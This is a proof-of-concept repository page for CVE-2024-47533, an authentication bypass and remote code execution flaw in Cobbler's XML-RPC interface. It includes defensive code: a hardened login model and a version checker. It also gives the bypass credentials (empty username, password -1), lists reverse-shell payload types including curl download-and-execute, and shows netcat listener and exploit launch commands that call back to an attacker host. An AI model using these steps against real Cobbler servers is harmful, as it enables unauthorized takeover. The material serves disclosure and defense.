
CVE-2024-47533 PoC — Cobbler Authorization Vulnerability

Source
Associated Vulnerability
Title: Cobbler Authorization Vulnerability (CVE-2024-47533)
Description: Cobbler is an open-source network installation server suite, used mainly to set up Linux network installation environments quickly. Cobbler versions 3.0.0 up to 3.2.3, and versions before 3.3.7, contain an authorization vulnerability caused by improper authentication, which lets anyone with network access to the server take complete control of it.
Description
CVE-2024-47533 is a critical authentication bypass vulnerability in Cobbler (versions 3.0.0 up to, but not including, 3.2.3 and 3.3.7) that allows unauthenticated remote code execution via the XML-RPC interface.
Readme
# CVE-2024-47533 - Cobbler XMLRPC Authentication Bypass RCE Exploit

⚠️ Critical Remote Code Execution via Authentication Bypass in Cobbler  
🛠️ PoC implementation by @dollarboysushil

---

## 💡 Overview

Cobbler, a Linux installation server that enables rapid setup of network installation environments, has an authentication vulnerability in versions 3.0.0 up to (but not including) 3.2.3 and 3.3.7. The function utils.get_shared_secret() always returns -1, allowing anyone to connect to the Cobbler XML-RPC interface with an empty username ('') and password -1. This lets an attacker with network access gain full control of the Cobbler server. The vulnerability is fixed in versions 3.2.3 and 3.3.7.

---

## 🛠 Technical Breakdown

The vulnerability is caused by improper handling of the shared secret in the `utils.get_shared_secret()` function, which always returns `-1`, effectively bypassing authentication. Any network user can therefore connect to Cobbler's XMLRPC interface with an empty username and the sentinel value `-1` as the password, obtain a valid session token, and execute arbitrary commands with it.
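To make the failure mode concrete for defenders reviewing similar code, the following is an added illustration and not Cobbler's source. It models the observable effect the advisory describes (the shared secret collapses to the in-band sentinel `-1`, so `login('', -1)` succeeds) and sets a fail-closed rewrite beside it. The modelled cause (a file read that raises inside a bare `except`, which returns the error sentinel on every call) is an assumption; the page only states the effect. The file path, `demo()` helper and the constructed secret are also assumptions.

```python
"""Vulnerable vs. hardened shared-secret login (illustrative, not Cobbler's code)."""
import hmac
import os
import secrets
import tempfile
from typing import Optional, Union


def vulnerable_get_shared_secret(path: str) -> Union[str, int]:
    """Modelled defect (assumption): opening in binary mode with encoding= raises
    ValueError in Python 3, the bare except swallows it, and -1 comes back every time."""
    try:
        with open(path, "rb", encoding="utf-8") as fd:
            return fd.read().decode().strip()
    except Exception:
        return -1


def vulnerable_login(user: str, password, shared_secret) -> bool:
    """Shared-secret path as the advisory describes it: empty user and a password
    compared with == against whatever get_shared_secret() returned."""
    if user == "":
        return password == shared_secret      # -1 == -1 -> authenticated
    return False


def hardened_get_shared_secret(path: str) -> Optional[str]:
    """Return the secret, or None on any failure; never an in-band sentinel."""
    try:
        with open(path, "r", encoding="utf-8") as fd:
            data = fd.read().strip()
    except OSError:
        return None
    return data or None                        # an empty file is as bad as no file


def hardened_login(user: str, password, shared_secret: Optional[str]) -> bool:
    """Fail closed: no loaded secret means no shared-secret logins at all."""
    if user != "":
        return False                           # only the shared-secret path is modelled here
    if shared_secret is None:
        return False                           # secret did not load -> refuse, do not compare
    if not isinstance(password, str):
        return False                           # XML-RPC can carry ints; never compare across types
    return hmac.compare_digest(password.encode(), shared_secret.encode())


def demo() -> dict:
    """Write a constructed secret file and exercise both code paths."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "web.ss")    # constructed stand-in for the real secret file
        real_secret = secrets.token_hex(32)
        with open(path, "w", encoding="utf-8") as fd:
            fd.write(real_secret + "\n")
        vuln_secret = vulnerable_get_shared_secret(path)
        hard_secret = hardened_get_shared_secret(path)
        return {
            "vuln_secret_value": vuln_secret,                       # -1 even though the file exists
            "vuln_bypass": vulnerable_login("", -1, vuln_secret),   # True: the bypass
            "hard_bypass": hardened_login("", -1, hard_secret),     # False
            "hard_real": hardened_login("", real_secret, hard_secret),  # True
            "hard_missing": hardened_login("", -1, hardened_get_shared_secret(path + ".missing")),  # False
        }


if __name__ == "__main__":
    print(demo())
```

The two review points this captures: an error sentinel must not be a value that can also arrive over the wire, and a secret that failed to load must disable the code path rather than be compared.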

---

## 🔥 Vulnerable Endpoint

`http://<target>:25151/` — Cobbler's XMLRPC API endpoint
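Before anything else, a defender wants to know which hosts on port 25151 are still on an affected release. The script below is an added example, not part of this PoC. It encodes the affected ranges from the advisory (3.0.0 up to 3.2.3, and 3.3.0 up to 3.3.7) and, for the network part, assumes the XML-RPC endpoint exposes an unauthenticated `extended_version()` call returning a dict with a `version` string; that call name and key are assumptions, and the offline parse-and-compare logic is the part worth keeping.

```python
"""Gate Cobbler hosts by reported version (added example; call name is an assumption)."""
import socket
import sys
import xmlrpc.client
from typing import Tuple

AFFECTED_RANGES = (                  # [first affected, first fixed) per the advisory
    ((3, 0, 0), (3, 2, 3)),
    ((3, 3, 0), (3, 3, 7)),
)


def parse_version(s: str) -> Tuple[int, int, int]:
    """'3.3.6' -> (3, 3, 6); tolerates suffixes such as '3.3.6.post1' or '3.2.0-rc1'."""
    parts = []
    for piece in s.replace("-", ".").split("."):
        if not piece.isdigit():
            break                        # stop at the first non-numeric component
        parts.append(int(piece))
    while len(parts) < 3:
        parts.append(0)
    return (parts[0], parts[1], parts[2])


def is_affected(version: str) -> bool:
    """True when the version falls inside one of the advisory's affected ranges."""
    v = parse_version(version)
    return any(low <= v < high for low, high in AFFECTED_RANGES)


def check_host(url: str, timeout: float = 5.0) -> Tuple[str, bool]:
    """Ask one endpoint for its version and classify it. Assumes extended_version()."""
    socket.setdefaulttimeout(timeout)    # ServerProxy has no timeout argument of its own
    proxy = xmlrpc.client.ServerProxy(url, allow_none=True)
    info = proxy.extended_version()
    version = str(info.get("version", ""))
    return version, is_affected(version)


if __name__ == "__main__":
    # Usage: python3 cobbler_version_gate.py http://host:25151/ [more URLs...]
    for url in sys.argv[1:] or ["http://127.0.0.1:25151/"]:
        try:
            ver, hit = check_host(url)
            print(f"{url}\t{ver or '?'}\t{'AFFECTED' if hit else 'not affected'}")
        except Exception as exc:         # unreachable host, non-XML-RPC listener, etc.
            print(f"{url}\terror: {exc}")
```

Note that a version string alone is a hint, not proof: a distribution may backport the fix without bumping the upstream version, so treat "AFFECTED" as "verify the package changelog" rather than a confirmed finding.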

---

## 💥 Example Payloads

The exploit script supports various reverse shell payloads including:

- Bash reverse shell
- Netcat shells (`nc`, `nc2`)
- Python reverse shell
- Curl download & execute

---

## 🔬 Proof-of-Concept (PoC) Demonstration

### 📡 Preparing the Listener

Start a Netcat listener on your machine:

```bash
nc -lvnp 4444
```

![netcat listener](images/image.png)

### 🚀 Launching the Exploit

Run the exploit script `CVE-2024-47533-dbs.py`:

```bash
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash
```

![CVE-2024-47533-dbs.py](images/image2.png)

### 💻 Successful Remote Shell Access

Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.

![Successful Reverse Shell](images/image3.png)

## 📝 References

- [SUSE Security Advisory for CVE-2024-47533](https://www.suse.com/security/cve/CVE-2024-47533.html)
- [GitHub Security Advisory GHSA-m26c-fcgh-cp6h](https://github.com/advisories/GHSA-m26c-fcgh-cp6h)
- [Snyk Vulnerability Database: SNYK-PYTHON-COBBLER-8384360](https://security.snyk.io/vuln/SNYK-PYTHON-COBBLER-8384360)
File Snapshot

```
[4.0K] /data/pocs/60914d9fafda55173ab6cd58aa241660fe742a11
├── [2.8K] CVE-2024-47533-dbs.py
├── [4.0K] images
│   ├── [ 39K] image2.png
│   ├── [ 28K] image3.png
│   └── [9.7K] image.png
└── [2.3K] README.md

1 directory, 5 files
```